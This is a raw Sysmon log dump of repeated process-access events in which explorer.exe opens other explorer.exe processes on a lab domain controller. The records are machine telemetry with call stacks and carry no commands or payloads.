16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 